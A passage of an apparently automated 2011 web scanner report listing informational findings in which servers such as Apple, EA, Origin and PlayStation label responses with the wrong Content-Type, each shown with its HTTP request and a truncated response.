P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app55
Accept-Ranges: bytes
Date: Fri, 24 Jun 2011 14:26:22 GMT
Connection: close

..............h.......(....... ...............H...H...........................................................VVW        
       
       
                                                                                       .....tOL+.        
       
       
                                       ...Q.        

...[SNIP]...
29.13. http://drh2.img.digitalriver.com/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh2.img.digitalriver.com
Path:   /store

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /store?SiteID=ea&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=8831800&orderBy=date+descending&size=1000&version=2&eaHideSearchResults=false&output=json&content=displayName+keywords+eaProdImageSmall+eaGenre+platform&jsonp=quicksearch HTTP/1.1
Host: drh2.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Thu, 23 Jun 2011 18:41:03 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=86400+0;age=33170;ecid=21745978456,0)
Content-Length: 72437
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc1app78
Access-Control-Allow-Origin: *
Cache-Control: max-age=86400
Expires: Sat, 25 Jun 2011 13:44:02 GMT
Date: Fri, 24 Jun 2011 13:44:02 GMT
Connection: close


<!-- REQUEST ID: TIME=1308854463854:NODE=c1a7803:THREAD=80 -->


/* Digital River ProductInfo Widget */
/* JSON Output */


...[SNIP]...
29.14. http://everquest2.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://everquest2.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: everquest2.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en; JSESSIONID=165A3BD41682208A464466107E45F69E.sdt-foyert15-27609; tsa1v691=uvid2e41e2ae9bb0e54440f0349f7c2d553588127; tsa1s691=usid2e41e2ae9bb0e54440f0349f7c2d553588127; __utmz=96005064.1308921990.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96005064.789728908.1308921990.1308921990.1308921990.1; __utmc=96005064; __utmb=96005064.1.10.1308921990; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:33 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 12 Oct 2004 19:07:45 GMT
ETag: "c74129-2796-cad12240"
Accept-Ranges: bytes
Content-Length: 10134
Content-Type: text/plain; charset=UTF-8

...... ..........f...........(...N... ..........v...........h...... .... ............... .h....#..(... ...@.........................................................................................
...[SNIP]...
29.15. http://images.apple.com/global/nav/scripts/globalnav.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://images.apple.com
Path:   /global/nav/scripts/globalnav.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /global/nav/scripts/globalnav.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ccl=DM6tKPNIkmYZsEVSBSdYOGJ7OTa7PjwA2735gwg+B3srHhFj8YVJDLNI3Wi2SUB1dCqrK7+XltzB/RcTVZmzUffySHH1UmBafoYJMj8YHYwt2pGgPse/fGM3FRGKsYngf6a77lbqVf66I18XlDNjfSTbjjIE0caGcGeQC4Ga/6t7SQdMOjY9JN8DEVW1UMoc6rrdnREZK82vJpIYTfG0q24uni8l6skyzHr5oYaAtC+cEVmOYnxcZEVM/0zwt8pWHHT7wAgPsXOSwDVj2beSsp5/JZ2hxDkV+qJm/gvvlB5s4gKqlC/OkT9MmT5nrCzrHJRdC+dWafIqs+ExZSu4RsRpt+yRsvm+2Ebw4C2MVPVg6mUwoEFIRaz9PCY0pRAq3LXUGVhUO8khrTSYOT60ngG/28nSEmej8riAE3H3pM3Ek1xzfTDSN4w9rduEpmRVOFjfLPb+A3mPF99al/pIw2PdnTJ0NQXeRkmztMT8xZeLjBS/B0mP+3zsHAYthpfDX9LIuH2xTPXrpJX2DeMFKurDBc9hP5LjsnlklHcD2q0g+oy0qYkWk5CBKjp+akzk; geo=US

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 21 Apr 2011 20:13:41 GMT
ETag: "6e6f-4a173609c2740"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
Cteonnt-Length: 28271
Content-Type: application/x-javascript
Content-Length: 28271
Cache-Control: max-age=436
Expires: Fri, 24 Jun 2011 13:39:50 GMT
Date: Fri, 24 Jun 2011 13:32:34 GMT
Connection: close

if(typeof(AC)=="undefined"){AC={}}document.createElement("nav");AC.addEvent=function(b,a,c){if(b.addEventListener){return b.addEventListener(a,c,false)
}else{return b.attachEvent("on"+a,c)}};AC.remove
...[SNIP]...
29.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.silobreaker.com%2Fspil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174&callback=_xdc_._w047jh&token=16347 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Fri, 24 Jun 2011 13:31:48 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._w047jh && _xdc_._w047jh( [1] )
29.17. http://media.celebritycruises.com/celebrity/content/en_US/images/specials/special_promotions/ports_header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://media.celebritycruises.com
Path:   /celebrity/content/en_US/images/specials/special_promotions/ports_header.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /celebrity/content/en_US/images/specials/special_promotions/ports_header.jpg HTTP/1.1
Host: media.celebritycruises.com
Proxy-Connection: keep-alive
Referer: http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000Ibyvhg2RH2zGHEU-8ogY638:12hdebcnj; wuc=USA

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "0825bd4d963c957ac1c67d9c85541e2e:1300513364"
Last-Modified: Sat, 19 Mar 2011 05:42:44 GMT
Accept-Ranges: bytes
Content-Length: 5438
Content-Type: image/jpeg
Cache-Control: max-age=1905685
Expires: Sat, 16 Jul 2011 14:44:05 GMT
Date: Fri, 24 Jun 2011 13:22:40 GMT
Connection: close

GIF89aX.@.............`........k...........w...........T.....!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61
...[SNIP]...
29.18. https://softlayer.parallelsmarketplace.com/store/design/images/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/design/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /store/design/images/favicon.ico HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; PHPSESSID=6a9429b7d6c03539695bbec853449bea

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:36 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 22 Jul 2010 10:35:53 GMT
ETag: "2258102-47e-7b8f1440"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

............ .h.......(....... ..... .....@...................................$/.0$/..$/.0........$/.0$/..$/.0................................$/..$/..$/..........$/..$/..$/............................
...[SNIP]...
29.19. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /store/index.php?info=statebook&CountryID=om HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://softlayer.parallelsmarketplace.com/store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; PHPSESSID=6a9429b7d6c03539695bbec853449bea

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:32 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

[]
29.20. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /PointRoll/Ads/PRScript.dll?v=129&pos=0&init=1&delay=0&push=0&set=2&bye=1&intact=3 HTTP/1.1
Host: spd.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ads.pointroll.com/PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=Eo1TOtJ24; PRgo=BBBAAuILBBVCFUE6

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-Type: text/plain
Content-Length: 12989
Date: Fri, 24 Jun 2011 13:31:35 GMT
Connection: close

/*PointRoll.2011 v129*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...
29.21. http://static.asiawebdirect.com/m/phuket/portals/phuket-com/homepage/islands/allParagraphs/0117/image/222  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.asiawebdirect.com
Path:   /m/phuket/portals/phuket-com/homepage/islands/allParagraphs/0117/image/222

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /m/phuket/portals/phuket-com/homepage/islands/allParagraphs/0117/image/222 HTTP/1.1
Host: static.asiawebdirect.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:46 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:20:46 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 24 Jun 2011 02:11:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21480

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................,..
...[SNIP]...
29.22. http://store.origin.com/DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.origin.com
Path:   /DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /DRHM/Storefront/Site/ea/pb/images/EA_favicon.ico HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000

Response

HTTP/1.1 200 OK
Cache-Control: max-age=157788000
Expires: Thu, 02 Jun 2016 14:40:03 GMT
ETag: "57e-4756dc38"
Content-Type: text/plain
Last-Modified: Wed, 05 Dec 2007 17:13:28 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=17888;ecid=129158849039,0)
Content-Length: 1406
Date: Fri, 03 Jun 2011 08:40:03 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Accept-Ranges: bytes

..............h.......(....... ...........@...........................)''.........776.....bba.........##$.............................................................................................zz
...[SNIP]...
29.23. http://store.origin.com/store  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://store.origin.com
Path:   /store

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /store?Action=DisplayPage&id=ProductFinderLogicPage&Locale=en_US&SiteID=ea&objectID=54552300&option=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_sivo=US%3AEASTORENA%3ANONE; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=111979717898,0)
Date: Fri, 24 Jun 2011 14:35:37 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app53
Content-Length: 2389


<!-- REQUEST ID: TIME=1308926137372:NODE=c2a5301:THREAD=4065 -->
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=be87e1f2&Env=BASE&Locale=en_US&SiteID=ea&ThemeID=718200&ceid=1
...[SNIP]...
29.24. https://store.playstation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://store.playstation.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: store.playstation.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E81B82051D2A0E-60000127A0560B82[CE]; mbox=check#true#1308858991|session#1308858899721-95544#1308860791|PC#1308858899721-95544.17#1310068531; APPLICATION_SITE_URL=http%3A//us.playstation.com/support/answer/index.htm%3Fa_id%3D2360; s_pers=%20gpv_pageName%3DPS/SUPPORT/ANSWER/2360%7C1308860739047%3B%20s_nr%3D1308858939053-Repeat%7C1340394939053%3B%20s_pv%3DPS/SUPPORT/ANSWER/2360%7C1308860739059%3B; JSESSIONID=4B412C125DA39E38D5DD0971331C3A38.lvp-p1-npnavpct02-2009

Response

HTTP/1.1 200 OK
Age: 1
Date: Fri, 24 Jun 2011 13:40:37 GMT
Cache-Control: private
Connection: Keep-Alive
Via: N1.SJC1: 100
ETag: "466-4a4aa1fef1380"
Server: Apache
Last-Modified: Wed, 01 Jun 2011 17:48:14 GMT
Accept-Ranges: bytes
Cteonnt-Length: 1126
Keep-Alive: timeout=300
Content-Type: text/plain; charset=UTF-8
Content-Length: 1126

............ .P.......(............. .....(................... .........................T1...pN...^..f=.N0..............bA(...f.bB+.........6...R1..U9$.K,..n?...........................T2.4...xC"...
...[SNIP]...
29.25. http://support.ea.com/ci/ajaxCustom/getHierValues/session/L3RpbWUvMTMwODkyMzAzMS9zaWQvOVpUQ2xqeGs%3D  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.ea.com
Path:   /ci/ajaxCustom/getHierValues/session/L3RpbWUvMTMwODkyMzAzMS9zaWQvOVpUQ2xqeGs%3D

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

POST /ci/ajaxCustom/getHierValues/session/L3RpbWUvMTMwODkyMzAzMS9zaWQvOVpUQ2xqeGs%3D HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
Content-Length: 74
Origin: http://support.ea.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; cp_session=aUR58eEjdoY8NOqVZocGFSaj1kmHr91_3GD0Kq_5e_2QOtVxt9_APJmn0HQcM9o1vR6OOOh0vGh4fpN523GTviviQomxMXaAkZXeuDtxExy1Gq3rWczmhtyS0yY8pUI0_f9BfcWm_%7E3QHn5aWFNvbVyUeyvtqjgtg3; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA

filter=products&lvl=1&id=&linking=0&url=%2Fci%2FajaxCustom%2FgetHierValues

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:07 GMT
Server: Apache
Set-Cookie: cp_session=aU7XKfxyS5I77oviAqqjP_RWhi7xeyg2H5DTHOmU3COJLJg4g_AZ6qPYm%7E5u_ATOPB2bw7jLEz9iQFPPhN87CuiZOGqi6XrVaplTEUzupaAzzMS9bgoz_XmmrKfT_t72x4OTkybgf4I86FsZX70iUTTCwR3Vvec%7E7j; path=/; httponly
RNT-Time: D=127163 t=1308923047845055
RNT-Machine: 19
Vary: Accept-Encoding
Content-Length: 8222
X-Cnection: close
Content-Type: text/html; charset=UTF-8

1$$1503 A.D. The New World||205$$2010 FIFA World Cup||206$$3 on 3 NHL Arcade||3058$$Alice: Madness Returns||207$$Aliens vs. Predator: Extinction||208$$Alpha Centauri||209$$American McGee's Alice||210$
...[SNIP]...
29.26. http://support.ea.com/ci/browserSearch/desc/http%3A%2F%2Fsupport.ea.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/%2Feuf%2Fassets%2Fimages%2Ficons%2Ffavicon_browserSearchPlugin.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.ea.com
Path:   /ci/browserSearch/desc/http%3A%2F%2Fsupport.ea.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/%2Feuf%2Fassets%2Fimages%2Ficons%2Ffavicon_browserSearchPlugin.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain XML.

Request

GET /ci/browserSearch/desc/http%3A%2F%2Fsupport.ea.com%2Fapp%2Fanswers%2Flist%2Fkw%2F%7BsearchTerms%7D/Support+Home+Page+Search/Support+Home+Page+Search/%2Feuf%2Fassets%2Fimages%2Ficons%2Ffavicon_browserSearchPlugin.ico HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_cc=true; evar1=Not%20Logged%20In; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA; cp_session=aUKCs2rHp31p7hCq4ZnExJPxkxtFTKazSX%7Eh1VRkVtH651WoN8qvPXFqrcVPlwPl_h8nJ7vrLp85fAN957PSYtNPL0FLz2x4FAth0vkLEDvM9RCvnBs0X_KFyMSs3Qywg_zWOxmDDye3yM9KlGHKllK6wd1YV2N4QZjHOzFs0wK4k%7EkOHf6mlCYcBoUboR9a88ppYKy_Mkm82ctS4ECoHXyCwQkeEQC8cE

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:20 GMT
Server: Apache
Expires: Sun, 24 Jul 2011 13:44:20 GMT
Content-Length: 828
RNT-Time: D=98817 t=1308923060031245
RNT-Machine: 19
X-Cnection: close
Content-Type: application/opensearchdescription+xml; charset="utf-8"

<?xml version="1.0" encoding="UTF-8"?>
<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">
<ShortNa
...[SNIP]...
29.27. http://support.ea.com/euf/rightnow/optimized/1308735671/themes/ea_com/images/ico_support_home.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.ea.com
Path:   /euf/rightnow/optimized/1308735671/themes/ea_com/images/ico_support_home.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /euf/rightnow/optimized/1308735671/themes/ea_com/images/ico_support_home.png HTTP/1.1
Host: support.ea.com
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; __utmz=103303007.1308923026.1.1.utmcsr=aboutus.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/ea_outreach.action; __utma=103303007.346541957.1308923026.1308923026.1308923026.1; __utmc=103303007; __utmb=103303007.1.10.1308923026; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; s_pv=no%20value; s_sq=eaeacom%2Ceaproducteacomna%2Ceaeabrandna%2Ceaeacomna%2Ceaproducteacomglobal%3D%2526pid%253Dhttp%25253A%25252F%25252Finvestors.ea.com%25252F%2526oid%253Dhttp%25253A%25252F%25252Feastore.ea.com%25252F%2526ot%253DA; cp_session=aUR58eEjdoY8NOqVZocGFSaj1kmHr91_3GD0Kq_5e_2QOtVxt9_APJmn0HQcM9o1vR6OOOh0vGh4fpN523GTviviQomxMXaAkZXeuDtxExy1Gq3rWczmhtyS0yY8pUI0_f9BfcWm_%7E3QHn5aWFNvbVyUeyvtqjgtg3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:02 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 07:01:59 GMT
Accept-Ranges: bytes
Content-Length: 1067
Cache-Control: max-age=2592000
Expires: Sun, 24 Jul 2011 13:44:02 GMT
RNT-Time: D=1669 t=1308923042603683
RNT-Machine: 03
X-Cnection: close
Content-Type: image/png

GIF89a.......w....:.+S...e...:r`..Aj.*W..<u.6j...Ak..!@.%I;e...Y.0](R.y..Ou.-[........$Fi...'L.%H.?|...Pv.%M..5h'R...Zc{.'P.<Jb@i.9Hd&O.(T.-W.#H.5a.1^..3d[.i..q.........,Uh...7l'@pYl.. ?.............
...[SNIP]...
